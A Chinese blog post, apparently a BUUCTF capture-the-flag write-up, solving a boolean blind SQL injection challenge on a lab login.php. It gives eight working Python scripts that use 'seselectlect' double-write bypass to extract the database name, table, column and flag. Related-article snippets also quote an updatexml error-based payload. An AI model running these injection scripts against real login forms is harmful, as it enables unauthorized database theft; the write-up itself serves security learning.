BUUCTF [第一章 web入门]SQL注入-2

最新推荐文章于 2024-05-05 18:14:22 发布
最新推荐文章于 2024-05-05 18:14:22 发布
阅读量2.5k 收藏 3
点赞数 2
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45707441/article/details/111561842
版权

在这里插入图片描述
在这里插入图片描述
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"}
当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}
根据返回的字符串,我们可以写出解决的python脚本

#数据库名字长度
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
for i in range(0,30):
    key="admin' and length(database())="+str(i)+"#"
    data={'name':key,'pass':'123'}
    r=requests.post(url,data=data).text
    if true in r:
        print("the length is",i)

在这里插入图片描述

#数据库名
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
    for j in range(32,128):
        key="admin' and ascii(substr(database(),%d,1))=%d#"%(i,j)
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            name=name+chr(j)
            print(name)

在这里插入图片描述

#表长度
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,30):
    key="admin' and length((seselectlect table_name FROM information_schema.tables WHERE table_schema='note' limit 0,1))="+str(i)+"#"
    data={'name':key,'pass':'123'}
    r=requests.post(url,data=data).text
    if true in r:
        print("the length of table is:",i)

在这里插入图片描述

#表名
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
    for j in range(32,128):
        key="admin' and ascii(substr((seselectlect table_name FROM information_schema.tables WHERE table_schema='note' limit 0,1),%d,1))=%d#"%(i,j)
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            print(chr(j))

在这里插入图片描述

#列长度
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(0,30):
    key="admin' and length((seselectlect column_name FROM information_schema.columns WHERE table_name='fl4g' limit 0,1))="+str(i)+"#"
    data={'name':key,'pass':'123'}
    r=requests.post(url,data=data).text
    if true in r:
        print("the length of conlumn of 'fl4g' is:",i)

在这里插入图片描述

#列名
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
    for j in range(32,128):
        key="admin' and ascii(substr((seselectlect column_name FROM information_schema.columns WHERE table_name='fl4g' limit 0,1),%d,1))=%d#"%(i,j)
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            name=name+chr(j)
            print(name)

在这里插入图片描述

#flag长度
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=4
name=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(0,60):
    key="admin' and length((seselectlect flag from fl4g limit 0,1))="+str(i)+"#"
    data = {'name': key, 'pass': '123'}
    r = requests.post(url, data=data).text
    if true in r:
        print("the length of column is:",i)

在这里插入图片描述

#flag
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"
false="u5728"
length=26
flag=""
database="note"
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
    for j in dic:
        key="admin' and (ascii(substr((seselectlect flag FROM fl4g limit 0,1),%d,1))="%i+str(ord(j))+")#"
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            flag=flag+j
            print(flag)

在这里插入图片描述

r0b1n_9070
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[初级]sql注入BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3739
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
SQL注入-初入web安全-详细知识图谱
11-06
SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL注入攻击可以发生在任何使用SQL...
buu(sql注入)
qq_62046696的博客
08-23 1180
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
SQL注入buuctf web入门sql注入2)
weixin_44214568的博客
07-13 1889
1.启动靶机: 2.进入login.php界面 ps:界面没有注入口,因为这个题目是sql注入,尝试输入常规的login界面,进入了login界面 我们学习ctf,在基础阶段还是要抛开脑洞,掌握并且形成一套破解模式 3.查看源代码 这个源代码里面有用的信息就是?tips=1,但是加到url后面也没什么效果 4.抓包吧 尝试了一下普通的注入没有啥用 5.先用burpsuit查看数据库 注入语句 1' and updatexml(1,concat(0x7e,(select data
2024年最全BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名或密码错误(2),【面试必备
最新发布
2301_79098336的博客
05-05 641
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
《从0到1:CTFer成长之路》SQL注入-2
ZhShy
01-11 873
靶场:SQL注入-2 知识点 burpsuit使用方法 首先为浏览器设置proxy代理,127.0.0.1:8080 在burp的proxy选项中打开intercept is on 在浏览器中访问网址,burp自动抓包,按ctrl+r发送至repeater选项 在repeater中进行修改,send后可在右栏查看返回内容 sql注入方法 测试是否存在注入点 按表名、列名、字段顺序依次查找 解题思路 1. 根据提示,访问login或user login.php 查看页面源代码,发现
移动App中常见的Web漏洞
weixin_33804990的博客
03-27 447
为什么80%的码农都做不了架构师?>>> ...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
第5章 5.WEB安全性测试--SQL注入一.mp4
05-08
第5章 5.WEB安全性测试--SQL注入一.mp4
第十一节 HTTP头中的SQL注入-01
09-15
第十一节 HTTP头中的SQL注入-01
unicode汉字编码转化
浮生九记
10-26 279
unicode汉字编码转化。
BUUCTF-N1BOOK-Web-SQL注入-2
m0_47154926的博客
10-08 477
打开出现以下界面 根据题目提示访问login.php 先查看源代码,看能不能发现一些有用的信息 提示为报错注入,关于报错注入 根据提示打开burp,在burp里进行注入 1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)# updatexml的第二个参数需要Xpath格式的字符串,以~开
BUUCTF 2
qq_52431855的博客
01-15 160
知识点: SQL堆叠注入:在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 show 在过滤了 select 和 where 的情况下,还可以使用 show 来爆出数据库名,表名,和列名。 show datebases; //数据库。 show tables; //表名。 show columns from table; //字段。 alert 作用:修改已知表的列。( 添加:ad
[web入门]SQL注入-2
1tachi的博客
12-02 606
请原谅我发出一点不友好的声音: 每个人无论是做完题了,还是没做完题,他只要是想进步,都会搜一下WP,尤其是BUUCTF的WP更有必要搜一下,为的是更标准、更多的思路,不成想我搜索发现,清一色! 思路一摸一样,用的函数一模一样,更甚之有的连思路都没有,上来就报错注入,生怕别人不知道他是抄的wp。。。令人无语! 我写的这个是我自己的思路,权当是留作笔记吧,或者是一点不健康的牢骚。。。 ...
BUU SQL COURSE 1
qq_51902218的博客
08-25 2283
1. 观察页面,只有两块主要内容,热点和登录 2. 测试登录,发现貌似没用存在注入点 3. 高度怀疑热点 ,这时候,我们打开火狐浏览器,用f12,选择网络看一下有什么猫腻 状态码200:请求已成功,请求所希望的响应头或数据体将随此响应返回。即返回的数据为全量的数据,如果文件不通过GZIP压缩的话,文件是多大,则要有多大传输量。 状态码304:如果客户端发送了一个带条件的 GET 请求且该请求已被允许,而文档的内容(自上次访问以来或者根据请求的条件)并没有改变,则服务器应当返回这个状态码...
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1267
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
C/CPP UTF8编码转成汉字 \u7528\u6237\u4e0d
热门推荐
friendan的专栏
08-14 7万+
参考文章:http://www.qingfengju.com/article.asp?id=245 现在的网站,经常返回下面这样的字符串: "error":"\u7528\u6237\u4e0d\u5b58\u5728\u6216\u5bc6\u7801\u9519\u8bef"} 其中的\u7528等就是汉字的UTF8编码了,如何将其还原成相应的字符呢? 代码如下: #
[第一章 web入门]sql注入-2
03-16
SQL注入是一种常见的网络攻击方式,攻击者通过在输入框中输入恶意代码,从而获取数据库中的敏感信息或者对数据库进行恶意操作。为了防止SQL注入攻击,我们需要对输入进行过滤和验证,同时使用参数化查询等安全措施来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值